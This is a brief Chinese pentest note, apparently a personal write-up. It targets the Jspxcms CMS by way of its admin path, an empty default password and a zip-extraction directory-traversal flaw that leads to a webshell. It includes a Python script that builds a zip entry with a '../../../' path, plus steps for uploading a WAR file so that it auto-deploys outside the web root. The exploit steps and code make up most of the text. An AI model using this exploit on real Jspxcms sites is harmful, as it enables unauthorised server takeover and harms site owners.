jspxcms
先百度一下后台地址
/cmscp/index.do
然后百度默认密码,默认密码为空。
找到一篇rce
https://www.hacksec.cn/Penetration-test/1284.html
Jspxcms后台的zip解压功能目录穿越漏洞导致getshell
由于这套CMS做了相关防御配置,压缩包里像上文中直接加入JSP文件是无法执行的,会报403错误。因而想到使用目录穿越的方式,跳出JspxCM的根目录,并根据war包会自动解压的特点,从而getshell。
先构造好war包
然后通过脚本写一个test5.zip压缩包,构造目录穿越
import zipfile
if __name__ == "__main__":
try:
binary = b''
zipFile = zipfile.ZipFile("test5.zip", "a", zipfile.ZIP_DEFLATED)
info = zipfile.ZipInfo("test5.zip")
zipFile.writestr("../../../safedog.html", binary)
zipFile.close()
except IOError as e:
raise e
然后将war拖入zip中进行上传
上传完之后点击解压,然后访问我们目录穿越的文件就好了
至此就结束了